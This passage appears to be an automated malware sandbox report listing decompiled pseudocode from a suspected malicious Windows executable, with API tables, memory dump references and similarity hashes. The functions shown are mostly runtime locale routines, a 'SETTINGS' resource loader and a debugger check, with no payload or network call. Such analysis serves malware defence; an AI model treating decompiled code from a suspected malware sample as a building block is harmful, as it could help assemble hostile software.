					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x44fe78;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x44fe80;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E0043206F(_t23, _t23);
									goto L25;
								}
								_t8 = _a8 + 8; // 0xfde8fe81
								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}
















                                            0x0043feb1
                                            0x0043feb2
                                            0x0043feb9
                                            0x0043ff5d
                                            0x0043ff6b
                                            0x0043ff76
                                            0x0043ff7c
                                            0x0043ff81
                                            0x0043ff83
                                            0x0043ff83
                                            0x0043ff89
                                            0x0043ff8e
                                            0x0043ff8e
                                            0x0043ff78
                                            0x0043ff78
                                            0x00000000
                                            0x0043ff78
                                            0x0043febf
                                            0x0043fec4
                                            0x00000000
                                            0x00000000
                                            0x0043feca
                                            0x0043fecf
                                            0x0043fed1
                                            0x0043fed1
                                            0x0043fed7
                                            0x00000000
                                            0x00000000
                                            0x0043fedc
                                            0x0043fef3
                                            0x0043fef3
                                            0x0043fefc
                                            0x0043fefe
                                            0x00000000
                                            0x00000000
                                            0x0043ff00
                                            0x0043ff05
                                            0x0043ff07
                                            0x0043ff07
                                            0x0043ff0d
                                            0x00000000
                                            0x00000000
                                            0x0043ff12
                                            0x0043ff30
                                            0x0043ff32
                                            0x0043ff55
                                            0x00000000
                                            0x0043ff5a
                                            0x0043ff42
                                            0x0043ff4d
                                            0x00000000
                                            0x00000000
                                            0x0043ff4f
                                            0x00000000
                                            0x0043ff4f
                                            0x0043ff14
                                            0x0043ff1c
                                            0x00000000
                                            0x00000000
                                            0x0043ff1e
                                            0x0043ff21
                                            0x0043ff27
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043ff29
                                            0x0043ff2b
                                            0x0043ff2d
                                            0x00000000
                                            0x0043ff2d
                                            0x0043fede
                                            0x0043fee6
                                            0x00000000
                                            0x00000000
                                            0x0043fee8
                                            0x0043feeb
                                            0x0043fef1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043fef1
                                            0x0043fef7
                                            0x0043fef9
                                            0x00000000

                                            APIs
                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004401CB,?,00000000), ref: 0043FF45
                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004401CB,?,00000000), ref: 0043FF6E
                                            • GetACP.KERNEL32(?,?,004401CB,?,00000000), ref: 0043FF83
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID: ACP$OCP
                                            • API String ID: 2299586839-711371036
                                            • Opcode ID: 094fa0582db58cb90f8c1aa2980e1579d082b580edfa0c3e235e4682995af791
                                            • Instruction ID: 1bdc0eec30e408869bda800bfc80fa12109c8cef5e14ca944a188f28f694217c
                                            • Opcode Fuzzy Hash: 094fa0582db58cb90f8c1aa2980e1579d082b580edfa0c3e235e4682995af791
                                            • Instruction Fuzzy Hash: 7121F422F00101AAE7308B64C901A9BB3A6AF5EB50F669477ED0DC7315E73ADD09C398
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004097FD, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 23COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004097FD(void** __ecx) {
				void* _t3;
				long _t4;
				void** _t5;
				struct HRSRC__* _t7;

				_t5 = __ecx;
				_t7 = FindResourceA(0, "SETTINGS", 0xa);
				_t3 = LockResource(LoadResource(0, _t7));
				_t4 = SizeofResource(0, _t7);
				 *_t5 = _t3;
				return _t4;
			}







                                            0x00409809
                                            0x00409811
                                            0x0040981d
                                            0x00409828
                                            0x0040982f
                                            0x00409833

                                            APIs
                                            • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 0040980B
                                            • LoadResource.KERNEL32(00000000,00000000,?,?,?,0040963D), ref: 00409816
                                            • LockResource.KERNEL32(00000000,?,?,?,0040963D), ref: 0040981D
                                            • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040963D), ref: 00409828
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Resource$FindLoadLockSizeof
                                            • String ID: SETTINGS
                                            • API String ID: 3473537107-594951305
                                            • Opcode ID: c7391d6c23bd694d48825e3632e48fdb27276d63ff9a7c8a1e4ae8d665b390df
                                            • Instruction ID: 18a25724f49de77851a94a05c57a1db338cf86abd9f885770aa53d59618d6aee
                                            • Opcode Fuzzy Hash: c7391d6c23bd694d48825e3632e48fdb27276d63ff9a7c8a1e4ae8d665b390df
                                            • Instruction Fuzzy Hash: 8BE0EC76740320ABE72017A56C4DF577E68EB87B63F000069F705DA1D4C6A54C00D765
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00440080, Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 89%
                                            			E00440080(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed int _t105;
				signed short _t108;
				signed int _t109;
				void* _t110;

				_t39 =  *0x45f014; // 0x8d941b67
				_v8 = _t39 ^ _t109;
				_t89 = _a12;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E00438D61(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E00438D61(_t89, __ecx, __edx);
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t92 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t102 =  &(_t46[1]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x44fe74; // 0x17
					E00440023(0, 0x44fd60, _t85 - 1, _t102);
					_t46 = _v24;
					_t110 = _t110 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					E0043F9C0(_t92, _t99,  &_v20);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						E0043FAA6(_t92, _t99,  &_v20);
					} else {
						E0043FA0B(_t92, _t99,  &_v20);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x44fd5c; // 0x41
						_t77 = E00440023(_t99, 0x44fa50, _t75 - 1, _v24);
						_t110 = _t110 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t108 = E0043FEAC(_t92,  ~_t105 & _t105 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t108;
								if(_t108 == 0) {
									goto L22;
								}
								__eflags = _t108 - 0xfde8;
								if(_t108 == 0xfde8) {
									goto L22;
								}
								__eflags = _t108 - 0xfde9;
								if(_t108 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t108 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t108;
								}
								E00438294(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_v24[0x94]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E004294CB(_v8 ^ _t109);
								}
								_t33 =  &(_t89[0x90]); // 0x435bb4
								E00438294(_t89, _t94, _t99, _t103, _t108, __eflags, _v16, _t33, 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t36 =  &(_t89[0x40]); // 0x435b14
								_t68 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								_t38 =  &(_t89[0x80]); // 0x435b94
								E0043326D(_t38, _t108, _t38, 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E0043FAA6(_t92, _t99,  &_v20);
						} else {
							E0043FA0B(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}



































                                            0x00440088
                                            0x0044008f
                                            0x00440096
                                            0x0044009a
                                            0x0044009e
                                            0x004400ac
                                            0x004400b1
                                            0x004400b2
                                            0x004400b3
                                            0x004400b4
                                            0x004400bc
                                            0x004400be
                                            0x004400c4
                                            0x004400ca
                                            0x004400cd
                                            0x004400cf
                                            0x004400d2
                                            0x004400d6
                                            0x004400dd
                                            0x004400ea
                                            0x004400ef
                                            0x004400f2
                                            0x004400f5
                                            0x004400f5
                                            0x004400f7
                                            0x004400fa
                                            0x004400fe
                                            0x0044016e
                                            0x00440170
                                            0x00440172
                                            0x00440185
                                            0x00440185
                                            0x0044018c
                                            0x00440192
                                            0x00440195
                                            0x00000000
                                            0x00440195
                                            0x00440174
                                            0x00440177
                                            0x00000000
                                            0x00000000
                                            0x0044017d
                                            0x00440182
                                            0x00000000
                                            0x00440105
                                            0x00440105
                                            0x00440109
                                            0x0044011f
                                            0x00440110
                                            0x00440114
                                            0x00440114
                                            0x00440128
                                            0x00440129
                                            0x004401b3
                                            0x004401b3
                                            0x00000000
                                            0x0044012f
                                            0x0044012f
                                            0x0044013e
                                            0x00440143
                                            0x00440148
                                            0x00440198
                                            0x00440198
                                            0x00440198
                                            0x0044019a
                                            0x0044019e
                                            0x004401b5
                                            0x004401c1
                                            0x004401cb
                                            0x004401ce
                                            0x004401cf
                                            0x004401d1
                                            0x00000000
                                            0x00000000
                                            0x004401d3
                                            0x004401d9
                                            0x00000000
                                            0x00000000
                                            0x004401db
                                            0x004401e1
                                            0x00000000
                                            0x00000000
                                            0x004401e7
                                            0x004401ed
                                            0x004401ef
                                            0x00000000
                                            0x00000000
                                            0x004401f6
                                            0x004401fc
                                            0x004401fe
                                            0x00000000
                                            0x00000000
                                            0x00440200
                                            0x00440203
                                            0x00440205
                                            0x00440207
                                            0x00440207
                                            0x00440218
                                            0x0044021d
                                            0x0044021f
                                            0x0044027f
                                            0x004401a2
                                            0x004401b2
                                            0x004401b2
                                            0x00440224
                                            0x0044022e
                                            0x0044023e
                                            0x00440244
                                            0x00440246
                                            0x00000000
                                            0x00000000
                                            0x0044024e
                                            0x0044025d
                                            0x00440263
                                            0x00440265
                                            0x00000000
                                            0x00000000
                                            0x0044026f
                                            0x00440277
                                            0x00000000
                                            0x0044027c
                                            0x004401a0
                                            0x00000000
                                            0x004401a0
                                            0x0044014a
                                            0x0044014c
                                            0x00440150
                                            0x00440166
                                            0x00440157
                                            0x0044015b
                                            0x0044015b
                                            0x0044016b
                                            0x00000000
                                            0x0044016b
                                            0x00440129

                                            APIs
                                              • Part of subcall function 00438D61: GetLastError.KERNEL32(?,00000000,00432FF3,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438D65
                                              • Part of subcall function 00438D61: _free.LIBCMT ref: 00438D98
                                              • Part of subcall function 00438D61: SetLastError.KERNEL32(00000000,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438DD9
                                              • Part of subcall function 00438D61: _abort.LIBCMT ref: 00438DDF
                                              • Part of subcall function 00438D61: _free.LIBCMT ref: 00438DC0
                                              • Part of subcall function 00438D61: SetLastError.KERNEL32(00000000,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438DCD
                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044018C
                                            • IsValidCodePage.KERNEL32(00000000), ref: 004401E7
                                            • IsValidLocale.KERNEL32(?,00000001), ref: 004401F6
                                            • GetLocaleInfoW.KERNEL32(?,00001001,00435A94,00000040,?,00435BB4,00000055,00000000,?,?,00000055,00000000), ref: 0044023E
                                            • GetLocaleInfoW.KERNEL32(?,00001002,00435B14,00000040), ref: 0044025D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                            • String ID:
                                            • API String ID: 745075371-0
                                            • Opcode ID: 33f9d4028ad6e15dd9e2bc80037c7983247ff9ed58a1ea7eaf0f6108909bff68
                                            • Instruction ID: 6a461799a60466efa18b21e533099bfb087c8a3796d3bcbb5491c2e9f886a1c7
                                            • Opcode Fuzzy Hash: 33f9d4028ad6e15dd9e2bc80037c7983247ff9ed58a1ea7eaf0f6108909bff68
                                            • Instruction Fuzzy Hash: AA518171A00205ABFF20DFA5DC45ABFB3B8AF09700F04456BFA04E7291D7799D148B69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00430AB0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 76%
                                            			E00430AB0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x45f014; // 0x8d941b67
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E004292FE(_t41);
					_pop(_t62);
				}
				E0042B710(_t67,  &_v804, 0, 0x50);
				E0042B710(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E004292FE(_t57);
				}
				return E004294CB(_v8 ^ _t70);
			}




































                                            0x00430ab0
                                            0x00430ab0
                                            0x00430ab0
                                            0x00430ab0
                                            0x00430abb
                                            0x00430ac0
                                            0x00430ac2
                                            0x00430aca
                                            0x00430acc
                                            0x00430acf
                                            0x00430ad4
                                            0x00430ad4
                                            0x00430ae0
                                            0x00430af3
                                            0x00430b01
                                            0x00430b07
                                            0x00430b0d
                                            0x00430b13
                                            0x00430b19
                                            0x00430b1f
                                            0x00430b25
                                            0x00430b2b
                                            0x00430b31
                                            0x00430b37
                                            0x00430b3e
                                            0x00430b45
                                            0x00430b4c
                                            0x00430b53
                                            0x00430b5a
                                            0x00430b61
                                            0x00430b62
                                            0x00430b6b
                                            0x00430b71
                                            0x00430b74
                                            0x00430b7a
                                            0x00430b87
                                            0x00430b90
                                            0x00430b99
                                            0x00430ba2
                                            0x00430bb0
                                            0x00430bb2
                                            0x00430bc7
                                            0x00430bd3
                                            0x00430bd6
                                            0x00430bdb
                                            0x00430bea

                                            APIs
                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,C:\Users\user\Desktop\V8IB839cvz.exe), ref: 00430BA8
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,C:\Users\user\Desktop\V8IB839cvz.exe), ref: 00430BB2
                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,C:\Users\user\Desktop\V8IB839cvz.exe), ref: 00430BBF
                                            Strings
                                            • C:\Users\user\Desktop\V8IB839cvz.exe, xrefs: 00430AC9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                            • String ID: C:\Users\user\Desktop\V8IB839cvz.exe
                                            • API String ID: 3906539128-1245965800
                                            • Opcode ID: 12c37f0ba390226f22f85071924aea904a3949024858fc6d64006cfdd7ed7eaf
                                            • Instruction ID: 8e48922fbc8ed2e29f8420103a95ef9505f7080e3e7647b50353f23d82a814f0
                                            • Opcode Fuzzy Hash: 12c37f0ba390226f22f85071924aea904a3949024858fc6d64006cfdd7ed7eaf
                                            • Instruction Fuzzy Hash: 7331D77490122CABCB21DF65D88878DB7B4BF08310F5046EAE40CA7251EB749F858F58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043F748, Relevance: 6.2, APIs: 4, Instructions: 236COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E0043F748(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebp;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				signed int _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				short _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t115 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t34 = E00438D61(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E0043F6D9(0x44fd60, 0x16, _t118);
					_t133 = _t133 + 0xc;
					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E0043F04A(_t87, _t94, _t115, _t118, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E0043F16D();
					} else {
						E0043F0D3(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E0043F6D9(0x44fa50, 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E0043F16D();
							} else {
								E0043F0D3(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E0043F5A7(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t121 = _a12;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t15 = _t121 + 0x120; // 0x435bbb
							_t89 = _t15;
							 *_t89 = 0;
							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = E0043DB39(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E00430CA7();
								asm("int3");
								_t132 = _t134;
								_t52 =  *0x45f014; // 0x8d941b67
								_v52 = _t52 ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E00438D61(_t89, _t100, _t116);
								_t122 =  *(E00438D61(_t90, _t100, _t116) + 0x34c);
								_t129 = E0043FE5B(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E00442CC1(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v272);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E0043FF8F(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								__eflags = _v32 ^ _t132;
								return E004294CB(_v32 ^ _t132);
							} else {
								_t68 = E004380A8(_t100, _t127, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t20 = _t121 + 0x80; // 0x435b1b
									_t92 = _t20;
									_t21 = _t121 + 0x120; // 0x435bbb
									if(E004380A8(_t100, _t127, _t154, _t21, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E00447457(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											_t22 = _t121 + 0x120; // 0x435bbb
											if(E004380A8(_t112, _t127, _t157, _t22, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E00447457(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												_t23 = _t121 + 0x100; // 0x435b9b
												E0043326D(_t112, _t127, _t23, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}












































                                            0x0043f748
                                            0x0043f74d
                                            0x0043f74e
                                            0x0043f74f
                                            0x0043f750
                                            0x0043f751
                                            0x0043f752
                                            0x0043f757
                                            0x0043f75a
                                            0x0043f75c
                                            0x0043f75f
                                            0x0043f75f
                                            0x0043f762
                                            0x0043f762
                                            0x0043f768
                                            0x0043f76b
                                            0x0043f76e
                                            0x0043f76e
                                            0x0043f771
                                            0x0043f774
                                            0x0043f77a
                                            0x0043f77c
                                            0x0043f781
                                            0x0043f78b
                                            0x0043f790
                                            0x0043f793
                                            0x0043f793
                                            0x0043f797
                                            0x0043f79b
                                            0x0043f7e4
                                            0x00000000
                                            0x0043f79d
                                            0x0043f7a2
                                            0x0043f7ab
                                            0x0043f7a4
                                            0x0043f7a4
                                            0x0043f7a4
                                            0x0043f7b2
                                            0x0043f7b6
                                            0x0043f7c0
                                            0x0043f7c5
                                            0x0043f7ca
                                            0x0043f7d0
                                            0x0043f7d4
                                            0x0043f7dd
                                            0x0043f7d6
                                            0x0043f7d6
                                            0x0043f7d6
                                            0x0043f7e9
                                            0x0043f7e9
                                            0x0043f7e9
                                            0x0043f7ca
                                            0x0043f7b6
                                            0x0043f7ef
                                            0x0043f901
                                            0x0043f901
                                            0x0043f901
                                            0x00000000
                                            0x0043f7f5
                                            0x0043f802
                                            0x0043f808
                                            0x00000000
                                            0x0043f838
                                            0x0043f838
                                            0x0043f83d
                                            0x0043f83f
                                            0x0043f83f
                                            0x0043f841
                                            0x0043f846
                                            0x0043f8fc
                                            0x0043f8fe
                                            0x00000000
                                            0x0043f84c
                                            0x0043f84c
                                            0x0043f84f
                                            0x0043f84f
                                            0x0043f857
                                            0x0043f85a
                                            0x0043f85d
                                            0x0043f85d
                                            0x0043f860
                                            0x0043f863
                                            0x0043f86b
                                            0x0043f870
                                            0x0043f877
                                            0x0043f87c
                                            0x0043f87f
                                            0x0043f881
                                            0x0043f90c
                                            0x0043f90d
                                            0x0043f90e
                                            0x0043f90f
                                            0x0043f910
                                            0x0043f911
                                            0x0043f916
                                            0x0043f91a
                                            0x0043f922
                                            0x0043f929
                                            0x0043f92c
                                            0x0043f92d
                                            0x0043f931
                                            0x0043f937
                                            0x0043f93f
                                            0x0043f94e
                                            0x0043f95a
                                            0x0043f96b
                                            0x0043f971
                                            0x0043f973
                                            0x0043f984
                                            0x0043f98b
                                            0x0043f98d
                                            0x0043f990
                                            0x0043f996
                                            0x0043f998
                                            0x0043f99a
                                            0x0043f99a
                                            0x0043f99d
                                            0x0043f9a0
                                            0x0043f9a0
                                            0x0043f998
                                            0x0043f9aa
                                            0x0043f975
                                            0x0043f975
                                            0x0043f977
                                            0x0043f9b2
                                            0x0043f9bd
                                            0x0043f887
                                            0x0043f890
                                            0x0043f895
                                            0x0043f897
                                            0x00000000
